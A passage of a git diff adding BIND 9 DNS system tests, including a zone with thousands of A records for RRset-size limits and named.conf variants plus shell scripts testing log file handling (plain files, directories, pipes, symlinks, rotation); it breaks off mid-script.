10.0.14.176 + A 10.0.14.177 + A 10.0.14.178 + A 10.0.14.179 + A 10.0.14.180 + A 10.0.14.181 + A 10.0.14.182 + A 10.0.14.183 + A 10.0.14.184 + A 10.0.14.185 + A 10.0.14.186 + A 10.0.14.187 + A 10.0.14.188 + A 10.0.14.189 + A 10.0.14.190 + A 10.0.14.191 + A 10.0.14.192 + A 10.0.14.193 + A 10.0.14.194 + A 10.0.14.195 + A 10.0.14.196 + A 10.0.14.197 + A 10.0.14.198 + A 10.0.14.199 + A 10.0.14.200 + A 10.0.14.201 + A 10.0.14.202 + A 10.0.14.203 + A 10.0.14.204 + A 10.0.14.205 + A 10.0.14.206 + A 10.0.14.207 + A 10.0.14.208 + A 10.0.14.209 + A 10.0.14.210 + A 10.0.14.211 + A 10.0.14.212 + A 10.0.14.213 + A 10.0.14.214 + A 10.0.14.215 + A 10.0.14.216 + A 10.0.14.217 + A 10.0.14.218 + A 10.0.14.219 + A 10.0.14.220 + A 10.0.14.221 + A 10.0.14.222 + A 10.0.14.223 + A 10.0.14.224 + A 10.0.14.225 + A 10.0.14.226 + A 10.0.14.227 + A 10.0.14.228 + A 10.0.14.229 + A 10.0.14.230 + A 10.0.14.231 + A 10.0.14.232 + A 10.0.14.233 + A 10.0.14.234 + A 10.0.14.235 + A 10.0.14.236 + A 10.0.14.237 + A 10.0.14.238 + A 10.0.14.239 + A 10.0.14.240 + A 10.0.14.241 + A 10.0.14.242 + A 10.0.14.243 + A 10.0.14.244 + A 10.0.14.245 + A 10.0.14.246 + A 10.0.14.247 + A 10.0.14.248 + A 10.0.14.249 + A 10.0.14.250 + A 10.0.14.251 + A 10.0.14.252 + A 10.0.14.253 + A 10.0.14.254 + A 10.0.14.255 + A 10.0.15.0 + A 10.0.15.1 + A 10.0.15.2 + A 10.0.15.3 + A 10.0.15.4 + A 10.0.15.5 + A 10.0.15.6 + A 10.0.15.7 + A 10.0.15.8 + A 10.0.15.9 + A 10.0.15.10 + A 10.0.15.11 + A 10.0.15.12 + A 10.0.15.13 + A 10.0.15.14 + A 10.0.15.15 + A 10.0.15.16 + A 10.0.15.17 + A 10.0.15.18 + A 10.0.15.19 + A 10.0.15.20 + A 10.0.15.21 + A 10.0.15.22 + A 10.0.15.23 + A 10.0.15.24 + A 10.0.15.25 + A 10.0.15.26 + A 10.0.15.27 + A 10.0.15.28 + A 10.0.15.29 + A 10.0.15.30 + A 10.0.15.31 + A 10.0.15.32 + A 10.0.15.33 + A 10.0.15.34 + A 10.0.15.35 + A 10.0.15.36 + A 10.0.15.37 + A 10.0.15.38 + A 10.0.15.39 + A 10.0.15.40 + A 10.0.15.41 + A 10.0.15.42 + A 10.0.15.43 + A 10.0.15.44 + A 10.0.15.45 + A 10.0.15.46 + A 10.0.15.47 + A 10.0.15.48 + A 10.0.15.49 + A 10.0.15.50 + A 10.0.15.51 + A 10.0.15.52 + A 10.0.15.53 + A 10.0.15.54 + A 10.0.15.55 + A 10.0.15.56 + A 10.0.15.57 + A 10.0.15.58 + A 10.0.15.59 + A 10.0.15.60 + A 10.0.15.61 + A 10.0.15.62 + A 10.0.15.63 + A 10.0.15.64 + A 10.0.15.65 + A 10.0.15.66 + A 10.0.15.67 + A 10.0.15.68 + A 10.0.15.69 + A 10.0.15.70 + A 10.0.15.71 + A 10.0.15.72 + A 10.0.15.73 + A 10.0.15.74 + A 10.0.15.75 + A 10.0.15.76 + A 10.0.15.77 + A 10.0.15.78 + A 10.0.15.79 + A 10.0.15.80 + A 10.0.15.81 + A 10.0.15.82 + A 10.0.15.83 + A 10.0.15.84 + A 10.0.15.85 + A 10.0.15.86 + A 10.0.15.87 + A 10.0.15.88 + A 10.0.15.89 + A 10.0.15.90 + A 10.0.15.91 + A 10.0.15.92 + A 10.0.15.93 + A 10.0.15.94 + A 10.0.15.95 + A 10.0.15.96 + A 10.0.15.97 + A 10.0.15.98 + A 10.0.15.99 + A 10.0.15.100 + A 10.0.15.101 + A 10.0.15.102 + A 10.0.15.103 + A 10.0.15.104 + A 10.0.15.105 + A 10.0.15.106 + A 10.0.15.107 + A 10.0.15.108 + A 10.0.15.109 + A 10.0.15.110 + A 10.0.15.111 + A 10.0.15.112 + A 10.0.15.113 + A 10.0.15.114 + A 10.0.15.115 + A 10.0.15.116 + A 10.0.15.117 + A 10.0.15.118 + A 10.0.15.119 + A 10.0.15.120 + A 10.0.15.121 + A 10.0.15.122 + A 10.0.15.123 + A 10.0.15.124 + A 10.0.15.125 + A 10.0.15.126 + A 10.0.15.127 + A 10.0.15.128 + A 10.0.15.129 + A 10.0.15.130 + A 10.0.15.131 + A 10.0.15.132 + A 10.0.15.133 + A 10.0.15.134 + A 10.0.15.135 + A 10.0.15.136 + A 10.0.15.137 + A 10.0.15.138 + A 10.0.15.139 + A 10.0.15.140 + A 10.0.15.141 + A 10.0.15.142 + A 10.0.15.143 + A 10.0.15.144 + A 10.0.15.145 + A 10.0.15.146 + A 10.0.15.147 + A 10.0.15.148 + A 10.0.15.149 + A 10.0.15.150 + A 10.0.15.151 + A 10.0.15.152 + A 10.0.15.153 + A 10.0.15.154 + A 10.0.15.155 + A 10.0.15.156 + A 10.0.15.157 + A 10.0.15.158 + A 10.0.15.159 + A 10.1.0.0 + A 10.1.0.1 + A 10.1.0.2 + A 10.1.0.3 + A 10.1.0.4 + A 10.1.0.5 + A 10.1.0.6 + A 10.1.0.7 + A 10.1.0.8 + A 10.1.0.9 + A 10.1.0.10 + A 10.1.0.11 + A 10.1.0.12 + A 10.1.0.13 + A 10.1.0.14 + A 10.1.0.15 + A 10.1.0.16 + A 10.1.0.17 + A 10.1.0.18 + A 10.1.0.19 + A 10.1.0.20 + A 10.1.0.21 + A 10.1.0.22 + A 10.1.0.23 + A 10.1.0.24 + A 10.1.0.25 + A 10.1.0.26 + A 10.1.0.27 + A 10.1.0.28 + A 10.1.0.29 + A 10.1.0.30 + A 10.1.0.31 + A 10.1.0.32 + A 10.1.0.33 + A 10.1.0.34 + A 10.1.0.35 + A 10.1.0.36 + A 10.1.0.37 + A 10.1.0.38 + A 10.1.0.39 + A 10.1.0.40 + A 10.1.0.41 + A 10.1.0.42 + A 10.1.0.43 + A 10.1.0.44 + A 10.1.0.45 + A 10.1.0.46 + A 10.1.0.47 + A 10.1.0.48 + A 10.1.0.49 + A 10.1.0.50 + A 10.1.0.51 + A 10.1.0.52 + A 10.1.0.53 + A 10.1.0.54 + A 10.1.0.55 + A 10.1.0.56 + A 10.1.0.57 + A 10.1.0.58 + A 10.1.0.59 + A 10.1.0.60 + A 10.1.0.61 + A 10.1.0.62 + A 10.1.0.63 + A 10.1.0.64 + A 10.1.0.65 + A 10.1.0.66 + A 10.1.0.67 + A 10.1.0.68 + A 10.1.0.69 + A 10.1.0.70 + A 10.1.0.71 + A 10.1.0.72 + A 10.1.0.73 + A 10.1.0.74 + A 10.1.0.75 + A 10.1.0.76 + A 10.1.0.77 + A 10.1.0.78 + A 10.1.0.79 + A 10.1.0.80 + A 10.1.0.81 + A 10.1.0.82 + A 10.1.0.83 + A 10.1.0.84 + A 10.1.0.85 + A 10.1.0.86 + A 10.1.0.87 + A 10.1.0.88 + A 10.1.0.89 + A 10.1.0.90 diff --git a/bin/tests/system/limits/ns1/named.conf.in b/bin/tests/system/limits/ns1/named.conf.in new file mode 100644 index 0000000..118fdbd --- /dev/null +++ b/bin/tests/system/limits/ns1/named.conf.in @@ -0,0 +1,35 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + minimal-responses no; +}; + +zone "." { + type primary; + file "root.db"; +}; + +zone "example" { + type primary; + file "example.db"; +}; diff --git a/bin/tests/system/limits/ns1/root.db b/bin/tests/system/limits/ns1/root.db new file mode 100644 index 0000000..b93cf32 --- /dev/null +++ b/bin/tests/system/limits/ns1/root.db @@ -0,0 +1,24 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. IN SOA gson.nominum.com. a.root.servers.nil. ( + 2000042100 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +. NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.1 + +example. NS ns1.example. +ns1.example. A 10.53.0.1 diff --git a/bin/tests/system/limits/setup.sh b/bin/tests/system/limits/setup.sh new file mode 100644 index 0000000..e46affa --- /dev/null +++ b/bin/tests/system/limits/setup.sh @@ -0,0 +1,17 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +copy_setports ns1/named.conf.in ns1/named.conf diff --git a/bin/tests/system/limits/tests.sh b/bin/tests/system/limits/tests.sh new file mode 100644 index 0000000..ff774f5 --- /dev/null +++ b/bin/tests/system/limits/tests.sh @@ -0,0 +1,56 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="-p ${PORT}" + +status=0 + +echo_i "1000 A records" +$DIG $DIGOPTS +tcp +norec 1000.example. @10.53.0.1 a > dig.out.1000 || status=1 +# $DIG $DIGOPTS 1000.example. @10.53.0.1 a > knowngood.dig.out.1000 +digcomp knowngood.dig.out.1000 dig.out.1000 || status=1 + +echo_i "2000 A records" +$DIG $DIGOPTS +tcp +norec 2000.example. @10.53.0.1 a > dig.out.2000 || status=1 +# $DIG $DIGOPTS 2000.example. @10.53.0.1 a > knowngood.dig.out.2000 +digcomp knowngood.dig.out.2000 dig.out.2000 || status=1 + +echo_i "3000 A records" +$DIG $DIGOPTS +tcp +norec 3000.example. @10.53.0.1 a > dig.out.3000 || status=1 +# $DIG $DIGOPTS 3000.example. @10.53.0.1 a > knowngood.dig.out.3000 +digcomp knowngood.dig.out.3000 dig.out.3000 || status=1 + +echo_i "4000 A records" +$DIG $DIGOPTS +tcp +norec 4000.example. @10.53.0.1 a > dig.out.4000 || status=1 +# $DIG $DIGOPTS 4000.example. @10.53.0.1 a > knowngood.dig.out.4000 +digcomp knowngood.dig.out.4000 dig.out.4000 || status=1 + +echo_i "exactly maximum rrset" +$DIG $DIGOPTS +tcp +norec +noedns a-maximum-rrset.example. @10.53.0.1 a > dig.out.a-maximum-rrset \ + || status=1 +# $DIG $DIGOPTS a-maximum-rrset.example. @10.53.0.1 a > knowngood.dig.out.a-maximum-rrset +digcomp knowngood.dig.out.a-maximum-rrset dig.out.a-maximum-rrset || status=1 + +echo_i "exceed maximum rrset (5000 A records)" +$DIG $DIGOPTS +tcp +norec +noadd 5000.example. @10.53.0.1 a > dig.out.exceed || status=1 +# Look for truncation bit (tc). +grep 'flags: .*tc.*;' dig.out.exceed > /dev/null || { + echo_i "TC bit was not set" + status=1 +} + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/logfileconfig/clean.sh b/bin/tests/system/logfileconfig/clean.sh new file mode 100644 index 0000000..18aa5de --- /dev/null +++ b/bin/tests/system/logfileconfig/clean.sh @@ -0,0 +1,36 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Clean up after log file tests +# +rm -f ns1/named.conf +rm -f ns1/named.args +rm -f ns1/named.pid ns1/named.run ns1/named.run.prev +rm -f ns1/named.memstats ns1/dig.out +rm -f ns1/named_log ns1/named_pipe ns1/named_sym +rm -rf ns1/named_dir +rm -f ns1/named_deflog +rm -f ns*/named.lock +rm -f ns1/query_log +rm -f ns1/named_iso8601 +rm -f ns1/named_iso8601_utc +rm -f ns1/rndc.out.test* +rm -f ns1/dig.out.test* +rm -f ns1/named_vers +rm -f ns1/named_vers.* +rm -f ns1/named_ts +rm -f ns1/named_ts.* +rm -f ns1/named_unlimited +rm -f ns1/named_unlimited.* +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/logfileconfig/named1.args b/bin/tests/system/logfileconfig/named1.args new file mode 100644 index 0000000..764d4c9 --- /dev/null +++ b/bin/tests/system/logfileconfig/named1.args @@ -0,0 +1 @@ +-c named.conf -m record -T nosyslog -d 99 -D logfileconfig-ns1 -X named.lock -U 4 diff --git a/bin/tests/system/logfileconfig/named2.args b/bin/tests/system/logfileconfig/named2.args new file mode 100644 index 0000000..fb9fe57 --- /dev/null +++ b/bin/tests/system/logfileconfig/named2.args @@ -0,0 +1 @@ +-c named.conf -m record -T nosyslog -d 99 -D logfileconfig-ns1 -X named.lock -U 4 -L named_deflog diff --git a/bin/tests/system/logfileconfig/ns1/named.dirconf.in b/bin/tests/system/logfileconfig/ns1/named.dirconf.in new file mode 100644 index 0000000..12b3e96 --- /dev/null +++ b/bin/tests/system/logfileconfig/ns1/named.dirconf.in @@ -0,0 +1,43 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + dnssec-validation no; + recursion no; + notify yes; +}; + +logging { + channel default_log { + file "/tmp"; + print-time yes; + }; + category default { default_log; default_debug; }; + category lame-servers { null; }; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { "rndc-key"; }; +}; + +key rndc-key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; diff --git a/bin/tests/system/logfileconfig/ns1/named.iso8601-utc.in b/bin/tests/system/logfileconfig/ns1/named.iso8601-utc.in new file mode 100644 index 0000000..2b4b181 --- /dev/null +++ b/bin/tests/system/logfileconfig/ns1/named.iso8601-utc.in @@ -0,0 +1,43 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + dnssec-validation no; + recursion no; + notify yes; +}; + +logging { + channel default_log { + file "named_iso8601_utc"; + print-time iso8601-utc; + severity debug 9; + }; + category default { default_log; default_debug; }; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { "rndc-key"; }; +}; + +key rndc-key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; diff --git a/bin/tests/system/logfileconfig/ns1/named.iso8601.in b/bin/tests/system/logfileconfig/ns1/named.iso8601.in new file mode 100644 index 0000000..1eb1aa8 --- /dev/null +++ b/bin/tests/system/logfileconfig/ns1/named.iso8601.in @@ -0,0 +1,43 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + dnssec-validation no; + recursion no; + notify yes; +}; + +logging { + channel default_log { + file "named_iso8601"; + print-time iso8601; + severity debug 9; + }; + category default { default_log; default_debug; }; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { "rndc-key"; }; +}; + +key rndc-key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; diff --git a/bin/tests/system/logfileconfig/ns1/named.pipeconf.in b/bin/tests/system/logfileconfig/ns1/named.pipeconf.in new file mode 100644 index 0000000..5497b62 --- /dev/null +++ b/bin/tests/system/logfileconfig/ns1/named.pipeconf.in @@ -0,0 +1,43 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + dnssec-validation no; + recursion no; + notify yes; +}; + +logging { + channel default_log { + file "named_pipe"; + print-time yes; + }; + category default { default_log; default_debug; }; + category lame-servers { null; }; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { "rndc-key"; }; +}; + +key rndc-key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; diff --git a/bin/tests/system/logfileconfig/ns1/named.plain.in b/bin/tests/system/logfileconfig/ns1/named.plain.in new file mode 100644 index 0000000..53a1946 --- /dev/null +++ b/bin/tests/system/logfileconfig/ns1/named.plain.in @@ -0,0 +1,50 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + dnssec-validation no; + recursion no; + notify yes; +}; + +logging { + channel default_log { + file "named_log"; + print-time yes; + }; + category default { default_log; default_debug; }; + category lame-servers { null; }; + + channel query_log { + file "query_log"; + print-time yes; + buffered yes; + }; + category queries { query_log; }; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { "rndc-key"; }; +}; + +key rndc-key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; diff --git a/bin/tests/system/logfileconfig/ns1/named.plainconf.in b/bin/tests/system/logfileconfig/ns1/named.plainconf.in new file mode 100644 index 0000000..8a70ca0 --- /dev/null +++ b/bin/tests/system/logfileconfig/ns1/named.plainconf.in @@ -0,0 +1,34 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + dnssec-validation no; + recursion no; + notify yes; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { "rndc-key"; }; +}; + +key rndc-key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; diff --git a/bin/tests/system/logfileconfig/ns1/named.symconf.in b/bin/tests/system/logfileconfig/ns1/named.symconf.in new file mode 100644 index 0000000..5b30e57 --- /dev/null +++ b/bin/tests/system/logfileconfig/ns1/named.symconf.in @@ -0,0 +1,43 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + dnssec-validation no; + recursion no; + notify yes; +}; + +logging { + channel default_log { + file "named_sym"; + print-time yes; + }; + category default { default_log; default_debug; }; + category lame-servers { null; }; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { "rndc-key"; }; +}; + +key rndc-key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; diff --git a/bin/tests/system/logfileconfig/ns1/named.tsconf.in b/bin/tests/system/logfileconfig/ns1/named.tsconf.in new file mode 100644 index 0000000..4b0f8af --- /dev/null +++ b/bin/tests/system/logfileconfig/ns1/named.tsconf.in @@ -0,0 +1,52 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + dnssec-validation no; + recursion no; + notify yes; +}; + +logging { + channel default_log { + buffered no; + file "named_ts" versions 3 size 1000 suffix timestamp; # small size + severity debug 100; + print-time yes; + }; + category default { default_log; default_debug; }; + category lame-servers { null; }; + + channel query_log { + file "query_log"; + print-time yes; + buffered yes; + }; + category queries { query_log; }; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { "rndc-key"; }; +}; + +key rndc-key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; diff --git a/bin/tests/system/logfileconfig/ns1/named.unlimited.in b/bin/tests/system/logfileconfig/ns1/named.unlimited.in new file mode 100644 index 0000000..506b49b --- /dev/null +++ b/bin/tests/system/logfileconfig/ns1/named.unlimited.in @@ -0,0 +1,52 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + dnssec-validation no; + recursion no; + notify yes; +}; + +logging { + channel default_log { + buffered no; + file "named_unlimited" versions unlimited size 1000; + severity debug 100; + print-time yes; + }; + category default { default_log; default_debug; }; + category lame-servers { null; }; + + channel query_log { + file "query_log"; + print-time yes; + buffered yes; + }; + category queries { query_log; }; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { "rndc-key"; }; +}; + +key rndc-key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; diff --git a/bin/tests/system/logfileconfig/ns1/named.versconf.in b/bin/tests/system/logfileconfig/ns1/named.versconf.in new file mode 100644 index 0000000..3860ae8 --- /dev/null +++ b/bin/tests/system/logfileconfig/ns1/named.versconf.in @@ -0,0 +1,52 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + dnssec-validation no; + recursion no; + notify yes; +}; + +logging { + channel default_log { + buffered no; + file "named_vers" versions 5 size 1000; // really small size + severity debug 100; + print-time yes; + }; + category default { default_log; default_debug; }; + category lame-servers { null; }; + + channel query_log { + file "query_log"; + print-time yes; + buffered yes; + }; + category queries { query_log; }; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { "rndc-key"; }; +}; + +key rndc-key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; diff --git a/bin/tests/system/logfileconfig/setup.sh b/bin/tests/system/logfileconfig/setup.sh new file mode 100644 index 0000000..0e0cc89 --- /dev/null +++ b/bin/tests/system/logfileconfig/setup.sh @@ -0,0 +1,19 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +$SHELL clean.sh + +copy_setports ns1/named.plain.in ns1/named.conf diff --git a/bin/tests/system/logfileconfig/tests.sh b/bin/tests/system/logfileconfig/tests.sh new file mode 100644 index 0000000..2cfb558 --- /dev/null +++ b/bin/tests/system/logfileconfig/tests.sh @@ -0,0 +1,244 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh +THISDIR=`pwd` +CONFDIR="ns1" + +# Test given condition. If true, test again after a second. Used for testing +# filesystem-dependent conditions in order to prevent false negatives caused by +# directory contents not being synchronized immediately after rename() returns. +test_with_retry() { + if test "$@"; then + sleep 1 + if test "$@"; then + return 0 + fi + fi + return 1 +} + +status=0 +n=0 + +echo_i "testing log file validity (named -g + only plain files allowed)" + +# First run with a known good config. +n=$((n+1)) +echo_i "testing log file validity (only plain files allowed) ($n)" +ret=0 +cat /dev/null > ns1/named_log +copy_setports ns1/named.plainconf.in ns1/named.conf +nextpart ns1/named.run > /dev/null +rndc_reconfig ns1 10.53.0.1 > rndc.out.test$n +wait_for_log 5 "reloading configuration succeeded" ns1/named.run || ret=1 +if [ "$ret" -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Now try directory, expect failure +n=$((n+1)) +echo_i "testing directory as log file ($n)" +ret=0 +nextpart ns1/named.run > /dev/null +copy_setports ns1/named.dirconf.in ns1/named.conf +rndc_reconfig ns1 10.53.0.1 > rndc.out.test$n +wait_for_log 5 "reloading configuration failed: invalid file" ns1/named.run || ret=1 +if [ "$ret" -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Now try pipe file, expect failure +n=$((n+1)) +echo_i "testing pipe file as log file ($n)" +ret=0 +nextpart ns1/named.run > /dev/null +rm -f ns1/named_pipe +if mkfifo ns1/named_pipe >/dev/null 2>&1; then + copy_setports ns1/named.pipeconf.in ns1/named.conf + rndc_reconfig ns1 10.53.0.1 > rndc.out.test$n + wait_for_log 5 "reloading configuration failed: invalid file" ns1/named.run || ret=1 + if [ "$ret" -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) +else + echo_i "skipping pipe test (unable to create pipe)" +fi + +# Now try symlink file to plain file, expect success +n=$((n+1)) +echo_i "testing symlink to plain file as log file ($n)" +ret=0 +rm -f ns1/named_log ns1/named_sym +touch ns1/named_log +if ln -s $(pwd)/ns1/named_log $(pwd)/ns1/named_sym >/dev/null 2>&1; then + nextpart ns1/named.run > /dev/null + copy_setports ns1/named.symconf.in 